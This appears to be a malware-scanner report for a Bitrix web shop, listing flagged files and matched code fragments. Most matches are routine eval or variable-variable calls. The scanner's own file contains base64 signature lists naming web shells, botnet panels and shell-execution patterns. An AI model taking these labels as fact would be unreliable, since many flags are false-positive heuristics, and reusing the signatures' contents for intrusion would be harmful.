/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_callformoutput.php Size: 33.92 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->__cache_tpl.'<?'); $strReturn = ob_get_contents(); ob_end_clean(); return $strReturn; } else { return false; } } function IncludeFormTemplate() { global $APPLICATION; if ($this->__check_form_cache()) { $APPLICATION->SetTemplateCSS("form/form.css"); $FORM =& $this; eval($this->__cache_tpl); return true; } else { return false; } } function isStatisticIncluded() { return CModule::IncludeModule("statistic"); } function __check_form_cache() { global $CACHE_MANAGER; if (strlen($this->...
| Sign 11413268 Line: 100 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_callform.php Size: 64.56 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit double_var2 Line: 522 Warning Double var technique is usually used for the obfuscation of malicious code |
${$var}
| Exploit double_var2 Line: 532 Warning Double var technique is usually used for the obfuscation of malicious code |
${$var2}
| Exploit execution Line: 11 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_callformvalidator.php Size: 7.56 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_cformresult_old.php Size: 7.27 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_callformfield.php Size: 22.07 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_callformresult.php Size: 68.14 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/admin/form_field_edit.php Size: 31.00 kB Created: 2023-03-11 16:40:19 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('function() {FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();}');
arInputs[i].onchange = new Function('FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();');
}
if (new_name == 'MESSAGE_' + (rows_count+1))
{
arInputs[i].onchange = jsFormValidatorSettings.UpdateAll;
}
}
var input1 = BX.create('INPUT', {
props: {
type: 'hidden',
name: 'ANSWER[]',
value: rows_count + 1
}
}),
input2 = BX.create('...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/mysql/support.php Size: 57.97 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/mysql/update.php Size: 457.00 B Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/mysql/dictionary.php Size: 4.43 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/mysql/sla.php Size: 3.73 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/mysql/reminder.php Size: 385.00 B Created: 2023-03-11 16:41:39 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/holidays.php Size: 9.67 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/support.php Size: 98.40 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/timetable.php Size: 8.02 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/timetablecache.php Size: 19.81 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/search.php Size: 12.96 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/update.php Size: 13.00 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/dictionary.php Size: 10.79 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/sla.php Size: 16.56 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/classes/general/reminder.php Size: 19.74 kB Created: 2023-03-11 16:41:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/admin/ticket_graph.php Size: 5.75 kB Created: 2023-03-11 16:41:43 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/admin/ticket_report_graph.php Size: 20.00 kB Created: 2023-03-11 16:41:43 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/admin/ticket_sla_list.php Size: 12.08 kB Created: 2023-03-11 16:41:43 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 86 Warning Double var technique is usually used for the obfuscation of malicious code |
${$key}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/admin/ticket_diagram_time.php Size: 2.72 kB Created: 2023-03-11 16:41:43 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/admin/ticket_diagram_mess.php Size: 2.42 kB Created: 2023-03-11 16:41:43 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/admin/ticket_graph_legend.php Size: 1.19 kB Created: 2023-03-11 16:41:43 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/admin/ru/ticket_message_js.php Size: 6.66 kB Created: 2023-03-11 16:41:43 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Function eval Line: 29 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (DoInsert(objTextarea, "<"+thetag+">", "</"+thetag+">"))
{
eval(thetag + "_open = 1");
eval("document.form1." + thetag + ".value += '*'");
}
}
else
{
DoInsert(objTextarea, "</"+thetag+">", "");
eval("document.form1." + thetag + ".value = ' " + eval(thetag + "_title") + " '");
eval(thetag + "_open = 0");
}
BX.fireEvent(objTextarea, 'change');
}
function mozillaWr(textarea, open, close)
{
var selLength = textarea.textLength;...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/admin/ticket_desktop.php Size: 23.98 kB Created: 2023-03-11 16:41:43 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/install/events/set_events.php Size: 6.00 kB Created: 2023-03-11 16:41:42 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/support/install/index.php Size: 8.05 kB Created: 2023-03-11 16:41:42 Modified: 2023-11-27 14:53:31 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/index.php Size: 83.00 B Created: 2023-03-11 16:43:47 Modified: 2023-11-27 14:52:55 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 2 Dangerous Malware Signature (hash: 0f37c730) |
meta http-equiv="REFRESH" content="0;
|
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/allstars/sale.basket.basket/.default/template.php Size: 2.77 kB Created: 2023-03-11 16:37:13 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/allstars/sale.basket.basket/delayed/template.php Size: 2.31 kB Created: 2023-03-11 16:37:13 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/allstars/sale.order.ajax/order_main_template/template.php Size: 4.87 kB Created: 2023-03-11 16:37:13 Modified: 2023-11-27 14:53:31 Dangers: 5
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/allstars/sale.order.ajax/order_main_template/props.php Size: 4.64 kB Created: 2023-03-11 16:37:13 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/allstars/sale.order.ajax/order_main_template/related_props.php Size: 408.00 B Created: 2023-03-11 16:37:13 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/bitrix/sale.order.ajax/template_1/template.php Size: 7.30 kB Created: 2023-03-11 16:37:14 Modified: 2023-11-27 14:53:31 Dangers: 8
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/bitrix/sale.order.ajax/template_1/props.php Size: 2.83 kB Created: 2023-03-11 16:37:14 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/bitrix/sale.order.ajax/template_1/related_props.php Size: 408.00 B Created: 2023-03-11 16:37:14 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/templates/allstars/components/bitrix/sale.personal.order.list/order_history/template.php Size: 15.06 kB Created: 2023-03-11 16:37:16 Modified: 2023-11-27 14:53:31 Dangers: 2
|
/var/www/allstarsO/allstars.ua/payment/index.php Size: 2.15 kB Created: 2023-03-11 20:43:56 Modified: 2023-11-27 14:53:49 Dangers: 1
|
/var/www/allstarsO/allstars.ua/ai-bolit.php Size: 381.90 kB Created: 2023-04-11 16:38:16 Modified: 2023-11-27 14:52:41 Warns: 17 Dangers: 47
| Description | Match |
|---|
Exploit base64_long Line: 874 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo0MzA6e2k6MDtzOjE1OiJ3NGwzWHpZMyBNYWlsZXIiO2k6MTtzOjEwOiJDb2RlZF9ieV9WIjtpOjI7czozNToibW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbPHFxPkYxbDMiO2k6MztzOjEzOiJCeTxzMT5LeW1Mam5rIjtpOjQ7czoxMzoiQnk8czE+U2g0TGluayI7aTo1O3M6MTY6IkJ5PHMxPkFub25Db2RlcnMiO2k6NjtzOjQ2OiIkdXNlckFnZW50cyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IjtpOjc7czo2OiJbM3Jhbl0iO2k6ODtzOjEwOiJEYXduX2FuZ2VsIjtpOjk7czo4OiJSM0RUVVhFUyI7aToxMDtzOjIwOiJ2aXNpdG9yVHJhY2tlcl9pc01vYiI7aToxMTtzOjI0OiJjb21fY29udGVudC9hcnRpY2xlZC5waHAiO2k6MTI7czo...
| Exploit base64_long Line: 875 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo2Mzp7aTowO3M6NzoiZGVmYWNlciI7aToxO3M6MjQ6IllvdSBjYW4gcHV0IGEgbWQ1IHN0cmluZyI7aToyO3M6ODoicGhwc2hlbGwiO2k6MztzOjYyOiI8ZGl2IGNsYXNzPSJibG9jayBidHlwZTEiPjxkaXYgY2xhc3M9ImR0b3AiPjxkaXYgY2xhc3M9ImRidG0iPiI7aTo0O3M6ODoiYzk5c2hlbGwiO2k6NTtzOjg6InI1N3NoZWxsIjtpOjY7czo3OiJOVERhZGR5IjtpOjc7czo4OiJjaWhzaGVsbCI7aTo4O3M6NzoiRnhjOTlzaCI7aTo5O3M6MTI6IldlYiBTaGVsbCBieSI7aToxMDtzOjExOiJkZXZpbHpTaGVsbCI7aToxMTtzOjI1OiJIYWNrZWQgYnkgQWxmYWJldG9WaXJ0dWFsIjtpOjEyO3M6ODoiTjN0c2hlbGwiO2k6MTM7czoxMToiU3Rvcm03U2hlbGw...
| Exploit base64_long Line: 876 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTozMzM6e2k6MDtzOjM1OiJkZWZhdWx0X2FjdGlvblxzKj1ccypcXFsnIl1GaWxlc01hbiI7aToxO3M6MzM6ImRlZmF1bHRfYWN0aW9uXHMqPVxzKlsnIl1GaWxlc01hbiI7aToyO3M6MTAwOiJJTzo6U29ja2V0OjpJTkVULT5uZXdcKFByb3RvXHMqPT5ccyoidGNwIlxzKixccypMb2NhbFBvcnRccyo9PlxzKjM2MDAwXHMqLFxzKkxpc3RlblxzKj0+XHMqU09NQVhDT05OIjtpOjM7czo5NjoiXCRfKEdFVHxQT1NUfFNFUlZFUnxDT09LSUV8UkVRVUVTVClcW1xzKlsnIl17MCwxfXAyWyciXXswLDF9XHMqXF1ccyo9PVxzKlsnIl17MCwxfWNobW9kWyciXXswLDF9IjtpOjQ7czoyMzoiQ2FwdGFpblxzK0NydW5jaFxzK1RlYW0iO2k6NTtzOjExOiJieVxzK0dyaW5...
| Exploit base64_long Line: 877 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTozNDI6e2k6MDtzOjY4OiJmaWxlX2dldF9jb250ZW50c1woU1JWX05BTUVccypcLlxzKlsnIl1cP2FjdGlvbj1nZXRfc2l0ZXMmbm9kYV9uYW1lPSI7aToxO3M6NDA6IkxvY2F0aW9uOlxzKlthLXpBLVowLTlfXStcLmRvY3VtZW50XC5leGUiO2k6MjtzOjQwOiJpZlwoIXByZWdfbWF0Y2hcKFsnIl0vSGFja2VkIGJ5L2lbJyJdLFwkIjtpOjM7czo5OiJCeVxzK0FtIXIiO2k6NDtzOjE5OiJDb250ZW50LVR5cGU6XHMqXCRfIjtpOjU7czo0MDoiZXZhbFxzKlwoKlxzKmd6aW5mbGF0ZVxzKlwoKlxzKnN0cl9yb3QxMyI7aTo2O3M6MTA5OiJpZlxzKlwoXHMqaXNfY2FsbGFibGVccypcKCpccypbJyJdezAsMX1cYihmdHBfZXhlY3xzeXN0ZW18c2hlbGxfZXhlY3x...
| Exploit base64_long Line: 879 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxNDI6e2k6MDtzOjM3OiJlY2hvICI8c2NyaXB0PiBhbGVydFwoJyJcLlwkZGItPmdldEVyIjtpOjE7czo0MDoiZWNobyAiPHNjcmlwdD4gYWxlcnRcKCciXC5cJG1vZGVsLT5nZXRFciI7aToyO3M6ODoic29ydFwoXCkiO2k6MztzOjEwOiJtdXN0LXJldmFsIjtpOjQ7czo2OiJyaWV2YWwiO2k6NTtzOjk6ImRvdWJsZXZhbCI7aTo2O3M6NjY6InJlcXVpcmVccypcKCpccypcJF9TRVJWRVJcW1xzKlsnIl17MCwxfURPQ1VNRU5UX1JPT1RbJyJdezAsMX1ccypcXSI7aTo3O3M6NzE6InJlcXVpcmVfb25jZVxzKlwoKlxzKlwkX1NFUlZFUlxbXHMqWyciXXswLDF9RE9DVU1FTlRfUk9PVFsnIl17MCwxfVxzKlxdIjtpOjg7czo2NjoiaW5jbHVkZVxzKlwoKlxzKlw...
| Exploit base64_long Line: 880 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxNTk6e2k6MDtzOjI1OiJzbGlua3NcLnN1L2dldF9saW5rc1wucGhwIjtpOjE7czoxMzoiTUxfbGNvZGVcLnBocCI7aToyO3M6MTM6Ik1MXyVjb2RlXC5waHAiO2k6MztzOjE5OiJjb2Rlc1wubWFpbmxpbmtcLnJ1IjtpOjQ7czoxOToiX19saW5rZmVlZF9yb2JvdHNfXyI7aTo1O3M6MTM6IkxJTktGRUVEX1VTRVIiO2k6NjtzOjE0OiJMaW5rZmVlZENsaWVudCI7aTo3O3M6MTg6Il9fc2FwZV9kZWxpbWl0ZXJfXyI7aTo4O3M6Mjk6ImRpc3BlbnNlclwuYXJ0aWNsZXNcLnNhcGVcLnJ1IjtpOjk7czoxMToiTEVOS19jbGllbnQiO2k6MTA7czoxMToiU0FQRV9jbGllbnQiO2k6MTE7czoxNjoiX19saW5rZmVlZF9lbmRfXyI7aToxMjtzOjE2OiJTTEFydGljbGV...
| Exploit base64_long Line: 881 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo5NDp7aTowO3M6MTE6IkNWVjpccypcJGN2IjtpOjE7czoxMzoiSW52YWxpZFxzK1RWTiI7aToyO3M6MTE6IkludmFsaWQgUlZOIjtpOjM7czo0MDoiZGVmYXVsdFN0YXR1c1xzKj1ccypbJyJdSW50ZXJuZXQgQmFua2luZyI7aTo0O3M6Mjg6Ijx0aXRsZT5ccypDYXBpdGVjXHMrSW50ZXJuZXQiO2k6NTtzOjI3OiI8dGl0bGU+XHMqSW52ZXN0ZWNccytPbmxpbmUiO2k6NjtzOjM5OiJpbnRlcm5ldFxzK1BJTlxzK251bWJlclxzK2lzXHMrcmVxdWlyZWQiO2k6NztzOjExOiI8dGl0bGU+U2FycyI7aTo4O3M6MTM6Ijxicj5BVE1ccytQSU4iO2k6OTtzOjE4OiJDb25maXJtYXRpb25ccytPVFAiO2k6MTA7czoyNToiPHRpdGxlPlxzKkFic2FccytJbnRlcm5ldCI...
| Exploit base64_long Line: 882 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToyOTU6e2k6MDtzOjk1OiI8c2NyaXB0PnZhciBcdz0nJztccypzZXRUaW1lb3V0XChcZCtcKTsuKz9kZWZhdWx0X2tleS4rP3NlX3JlLis/ZGVmYXVsdF9rZXkuKz9mX3VybC4rPzwvc2NyaXB0PiI7aToxO3M6MTE0OiI8c2NyaXB0W14+XSs+dmFyIGE9Lis/U3RyaW5nXC5mcm9tQ2hhckNvZGVcKGFcLmNoYXJDb2RlQXRcKGlcKVxeMlwpfWM9dW5lc2NhcGVcKGJcKTtkb2N1bWVudFwud3JpdGVcKGNcKTs8L3NjcmlwdD4iO2k6MjtzOjI1MDoidmFyIFx3Kz1cWyJcZCsiLC4rPyJcZCsiXF07ZnVuY3Rpb24gXHcrXChcdytcKXt2YXIgXHcrPWRvY3VtZW50XFtcdytcKFx3K1xbXGQrXF1cKVxdXChcdytcKFx3K1xbXGQrXF1cKVwrXHcrXChcdytcW1xkK1xdXCk...
| Exploit base64_long Line: 883 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo3NDp7aTowO3M6NDg6ImRvY3VtZW50XC53cml0ZVxzKlwoXHMqdW5lc2NhcGVccypcKFsnIl17MCwxfSUzYyI7aToxO3M6Njk6ImRvY3VtZW50XC5nZXRFbGVtZW50c0J5VGFnTmFtZVwoWyciXWhlYWRbJyJdXClcWzBcXVwuYXBwZW5kQ2hpbGRcKGFcKSI7aToyO3M6Mjg6ImlwXChob25lXHxvZFwpXHxpcmlzXHxraW5kbGUiO2k6MztzOjQ4OiJzbWFydHBob25lXHxibGFja2JlcnJ5XHxtdGtcfGJhZGFcfHdpbmRvd3MgcGhvbmUiO2k6NDtzOjMwOiJjb21wYWxcfGVsYWluZVx8ZmVubmVjXHxoaXB0b3AiO2k6NTtzOjIyOiJlbGFpbmVcfGZlbm5lY1x8aGlwdG9wIjtpOjY7czoyOToiXChmdW5jdGlvblwoYSxiXCl7aWZcKC9cKGFuZHIiO2k6NztzOjQ5OiJ...
| Exploit base64_long Line: 884 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxMzE6e2k6MDtzOjE0OiJAKmV4dHJhY3RccypcKCI7aToxO3M6MTQ6IkAqZXh0cmFjdFxzKlwkIjtpOjI7czoxMjoiWyciXWV2YWxbJyJdIjtpOjM7czoyMToiWyciXWJhc2U2NF9kZWNvZGVbJyJdIjtpOjQ7czoyMzoiWyciXWNyZWF0ZV9mdW5jdGlvblsnIl0iO2k6NTtzOjE0OiJbJyJdYXNzZXJ0WyciXSI7aTo2O3M6NDM6ImZvcmVhY2hccypcKFxzKlwkZW1haWxzXHMrYXNccytcJGVtYWlsXHMqXCkiO2k6NztzOjc6IlNwYW1tZXIiO2k6ODtzOjE1OiJldmFsXHMqWyciXChcJF0iO2k6OTtzOjE3OiJhc3NlcnRccypbJyJcKFwkXSI7aToxMDtzOjI4OiJzcnBhdGg6Ly9cLlwuL1wuXC4vXC5cLi9cLlwuIjtpOjExO3M6MTI6InBocGluZm9ccypcKCI7aTo...
| Exploit base64_long Line: 885 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxMjE6e2k6MDtpOjA7aToxO2k6MDtpOjI7aTowO2k6MztpOjA7aTo0O2k6MDtpOjU7aTowO2k6NjtpOjA7aTo3O2k6MDtpOjg7aToxO2k6OTtpOjE7aToxMDtpOjA7aToxMTtpOjA7aToxMjtpOjA7aToxMztpOjA7aToxNDtpOjA7aToxNTtpOjA7aToxNjtpOjA7aToxNztpOjA7aToxODtpOjA7aToxOTtpOjA7aToyMDtpOjA7aToyMTtpOjA7aToyMjtpOjA7aToyMztpOjA7aToyNDtpOjA7aToyNTtpOjA7aToyNjtpOjA7aToyNztpOjA7aToyODtpOjA7aToyOTtpOjE7aTozMDtpOjE7aTozMTtpOjA7aTozMjtpOjA7aTozMztpOjA7aTozNDtpOjA7aTozNTtpOjA7aTozNjtpOjA7aTozNztpOjA7aTozODtpOjA7aTozOTtpOjA7aTo0MDtpOjA7aTo0MTtpOjA...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo1MzA6e2k6MDtzOjE0OiJCT1RORVRccytQQU5FTCI7aToxO3M6MTg6Ij09XHMqWyciXTQ2XC4yMjlcLiI7aToyO3M6MTg6Ij09XHMqWyciXTkxXC4yNDNcLiI7aTozO3M6NToiSlRlcm0iO2k6NDtzOjU6Ik9uZXQ3IjtpOjU7czo5OiJcJHBhc3NfdXAiO2k6NjtzOjU6InhDZWR6IjtpOjc7czoxMTY6ImlmXHMqXChccypmdW5jdGlvbl9leGlzdHNccypcKFxzKlsnIl17MCwxfVxiKGZ0cF9leGVjfHN5c3RlbXxzaGVsbF9leGVjfHBhc3N0aHJ1fHBvcGVufHByb2Nfb3BlbilbJyJdezAsMX1ccypcKVxzKlwpIjtpOjg7czoyNzoiXCRPT08uKz89XHMqdXJsZGVjb2RlXHMqXCgqIjtpOjk7czozODoic3RyZWFtX3NvY2tldF9jbGllbnRccypcKFxzKlsnIl10Y3A...
| Exploit double_var2 Line: 3756 Warning Double var technique is usually used for the obfuscation of malicious code |
${$p}
| Exploit download_remote_code2 Line: 85 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite|fputs|file_get_|call_user_func|file_put_|\$_REQUEST|ob_start|\$_GET|\$_POST|\$_SERVER|\$_FILES|move|copy|array_|reg_replace|mysql_|chr|fsockopen|\$GLOBALS|sqliteCreateFunction';
$g_VirusFiles = array('js', 'html', 'htm', 'suspicious')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($form->ScriptDisplay);') !== false) { $l_Vuln['id'] = 'RCE : RSFORM : rsform.php, LINE 1605'; $l_Vuln['ndx'] = $par_Index; $g_Vulnerable[] = $l_Vuln; return true; } return false; } if (strpos($par_Filename, 'fancybox-for-wordpress/fancybox.php') !== false) { if (strpos($par_Content, '\'reset\' == $_REQUEST[\'action\']') !== false) { $l_Vuln['id'] = 'CODE INJECTION : FANCYBOX'; $l_Vuln['ndx'] = $par_Index; $g_Vulnerable[] = $l_Vuln; return true; } return false; } if (strpos($par_Filename, 'c...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec("zip -v 2>&1", $output, $code); if ($code == 0) { $filter = ''; if ($configFiles && exec("grep -V 2>&1", $output, $code) && $code == 0) { $filter = "|grep -v -E '$configFilesRegex'"; } exec("cat AI-BOLIT-DOUBLECHECK.php $filter |zip -@ --password $g_QuarantinePass $archive", $output, $code); if ($code == 0) { file_put_contents($infoFile, $info); $m = array(); if (!empty($filter)) { foreach ($configFiles as $file) { $tmp = file_get_contents($file); $tmp = preg_replace('~^.*?pass.*~im', '', $...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($lStat['uid']) : array('name' => $lStat['uid']); $group = (function_exists('posix_getgrgid')) ? @posix_getgrgid($lStat['gid']) : array('name' => $lStat['uid']); $inf['permission'][] = $perm; $inf['owner'][] = $owner['name']; $inf['group'][] = $group['name']; $inf['size'][] = $lStat['size'] > 0 ? bytes2Human($lStat['size']) : '-'; $inf['ctime'][] = $lStat['ctime'] > 0 ? date("d/m/Y H:i:s", $lStat['ctime']) : '-'; $inf['mtime'][] = $lStat['mtime'] > 0 ? date("d/m/Y H:i:s", $lStat['m...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (Default: 1)
-x, --mode=INT Set scan mode. 0 - for basic, 1 - for expert and 2 for paranoic.
-k, --skip=jpg,... Skip specific extensions. E.g. --skip=jpg,gif,png,xls,pdf
--scan=php,... Scan only specific extensions. E.g. --scan=php,htaccess,js
-r, --report=PATH/EMAILS
Full path to create report or email address to send report to.
You can also specify multiple email separated by commas.
-q, Use only with ...
| Sign 085a0329 Line: 874 Dangerous Malware Signature (hash: 085a0329) |
iYXNlNj
| Sign 085a0329 Line: 877 Dangerous Malware Signature (hash: 085a0329) |
IVFRQX1VTRVJfQUdFTl
| Sign 0f37c730 Line: 874 Dangerous Malware Signature (hash: 0f37c730) |
mdW5jdGlvb
| Sign 11413268 Line: 2530 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 162cf671 Line: 875 Dangerous Malware Signature (hash: 162cf671) |
HTE9CQUxT
| Sign 162cf671 Line: 876 Dangerous Malware Signature (hash: 162cf671) |
hUVFBfVVNFUl9BR0VOV
| Sign 34b7e999 Line: 876 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
| Sign 407651f7 Line: 876 Dangerous Malware Signature (hash: 407651f7) |
w/cGhw
| Sign 407651f7 Line: 877 Dangerous Malware Signature (hash: 407651f7) |
wcmludG
| Sign 471b95ee Line: 874 Dangerous Malware Signature (hash: 471b95ee) |
SFRUUF9VU0VSX0FHRU5U
| Sign 4a069524 Line: 874 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 5c38b15f Line: 2637 Dangerous Malware Signature (hash: 5c38b15f) |
1337day.com
| Sign 7186bb8d Line: 258 Dangerous Malware Signature (hash: 7186bb8d) |
rootkit
| Sign 7186bb8d Line: 874 Dangerous Malware Signature (hash: 7186bb8d) |
RfR0VU
| Sign 7186bb8d Line: 876 Dangerous Malware Signature (hash: 7186bb8d) |
RfQ09PS0lF
| Sign 7186bb8d Line: 877 Dangerous Malware Signature (hash: 7186bb8d) |
RlZmluZ
| Sign 7830f7a6 Line: 874 Dangerous Malware Signature (hash: 7830f7a6) |
NvcH
| Sign 7830f7a6 Line: 876 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign 7f5d33bf Line: 874 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign 7f5d33bf Line: 876 Dangerous Malware Signature (hash: 7f5d33bf) |
JlcGxhY2
| Sign 7f5d33bf Line: 877 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign 7f5d33bf Line: 878 Dangerous Malware Signature (hash: 7f5d33bf) |
JlcXVpcm
| Sign 91535293 Line: 874 Dangerous Malware Signature (hash: 91535293) |
lY2hv
| Sign 91535293 Line: 876 Dangerous Malware Signature (hash: 91535293) |
ldmFs
| Sign 91535293 Line: 878 Dangerous Malware Signature (hash: 91535293) |
leHRyYWN0
| Sign 963e968a Line: 874 Dangerous Malware Signature (hash: 963e968a) |
PD9waH
| Sign 963e968a Line: 876 Dangerous Malware Signature (hash: 963e968a) |
pbmNsdWRl
| Sign a408f408 Line: 874 Dangerous Malware Signature (hash: a408f408) |
c2hlbG
| Sign a408f408 Line: 876 Dangerous Malware Signature (hash: a408f408) |
c3RyX
| Sign a408f408 Line: 878 Dangerous Malware Signature (hash: a408f408) |
cmVxdWlyZ
| Sign ae7830db Line: 874 Dangerous Malware Signature (hash: ae7830db) |
YmFzZTY0
| Sign ae7830db Line: 876 Dangerous Malware Signature (hash: ae7830db) |
YXJyYXlf
| Sign ae7830db Line: 878 Dangerous Malware Signature (hash: ae7830db) |
yZXF1aXJl
| Sign bced5841 Line: 874 Dangerous Malware Signature (hash: bced5841) |
8P3Boc
| Sign d30fc49e Line: 874 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d30fc49e Line: 877 Dangerous Malware Signature (hash: d30fc49e) |
ByaW50Z
| Sign d97f004d Line: 874 Dangerous Malware Signature (hash: d97f004d) |
ZWNob
| Sign d97f004d Line: 875 Dangerous Malware Signature (hash: d97f004d) |
ZXZhb
